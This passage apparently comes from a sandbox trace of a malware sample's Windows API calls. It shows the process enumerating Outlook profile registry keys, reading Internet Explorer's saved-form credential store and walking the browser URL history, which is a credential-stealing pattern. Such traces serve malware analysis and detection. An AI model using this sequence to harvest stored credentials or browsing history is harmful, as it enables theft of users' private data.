KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.963] RtlIntegerToChar (in: Value=0x4, Base=0x0, Length=0x20, String=0xdd708 | out: String="4") returned 0x0 [0164.963] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.963] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0164.963] NtEnumerateValueKey (in: KeyHandle=0x1b4, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x8000001a [0164.963] NtClose (Handle=0x1b4) returned 0x0 [0164.963] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x3, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0164.963] NtClose (Handle=0x1b0) returned 0x0 [0164.963] NtEnumerateKey (in: KeyHandle=0x17c, Index=0xa, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0164.963] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0164.963] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0164.964] NtClose (Handle=0x1b0) returned 0x0 [0164.964] NtEnumerateKey (in: KeyHandle=0x17c, Index=0xb, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0164.964] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0164.964] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0164.964] NtClose (Handle=0x1b0) returned 0x0 [0164.964] NtEnumerateKey (in: KeyHandle=0x17c, Index=0xc, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0164.964] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0164.964] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0164.964] NtClose (Handle=0x1b0) returned 0x0 [0164.964] NtEnumerateKey (in: KeyHandle=0x17c, Index=0xd, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0164.964] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x1b0) returned 0x0 [0164.964] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0164.965] NtClose (Handle=0x1b0) returned 0x0 [0164.965] NtEnumerateKey (in: KeyHandle=0x17c, Index=0xe, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x8000001a [0164.965] NtCreateKey (in: KeyHandle=0xdea50, DesiredAccess=0x20219, ObjectAttributes=0xde3e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook_2016\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea50*=0x1b0) returned 0x0 [0164.965] NtEnumerateKey (in: KeyHandle=0x1b0, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x8000001a [0165.065] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddb38 | out: TokenHandle=0xddb38*=0x1b4) returned 0x0 [0165.065] NtQueryInformationToken (in: TokenHandle=0x1b4, TokenInformationClass=0x1, TokenInformation=0xdd330, TokenInformationLength=0x400, ReturnLength=0xddb30 | out: TokenInformation=0xdd330, ReturnLength=0xddb30) returned 0x0 [0165.065] ConvertSidToStringSidW (in: Sid=0xdd338*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddb34 | out: StringSid=0xddb34*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0165.066] NtClose (Handle=0x1b4) returned 0x0 [0165.066] NtCreateKey (in: KeyHandle=0xdea4c, DesiredAccess=0x20219, ObjectAttributes=0xddb34*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea4c*=0x1b4) returned 0x0 [0165.067] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logri.ini", NtPathName=0xdda30, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.067] NtCreateFile (in: FileHandle=0xdda50, DesiredAccess=0x120089, ObjectAttributes=0xdda18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdda38, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdda50*=0x0, IoStatusBlock=0xdda38*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0165.067] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x67a808) returned 1 [0165.083] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xdda40 | out: ProcedureAddress=0xdda40*=0x76df92a0) returned 0x0 [0165.085] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xdda2c | out: ProcedureAddress=0xdda2c*=0x76e20060) returned 0x0 [0165.085] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1f4400) returned 0x851b020 [0165.179] CoInitialize (pvReserved=0x0) returned 0x0 [0165.380] CoCreateInstance (in: rclsid=0xddb44*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xddb54*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0xddb6c | out: ppv=0xddb6c*=0x6d7db0) returned 0x0 [0168.720] IUrlHistoryStg:EnumUrls (in: This=0x6d7db0, ppenum=0xddb68 | out: ppenum=0xddb68*=0x6da548) returned 0x0 [0168.724] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0xdf2e0 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.181] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.181] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.181] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.182] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.182] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.182] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.183] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.184] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.184] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.184] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.184] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.184] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.184] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.184] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.185] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.185] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.185] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.185] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.185] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.185] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.185] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.185] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.186] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.188] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.188] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.188] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.188] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.188] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.188] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.189] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.190] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.191] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.191] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.191] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.191] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.191] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.193] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.193] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.193] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.193] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.193] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.194] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.195] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.195] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.195] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.195] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.195] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 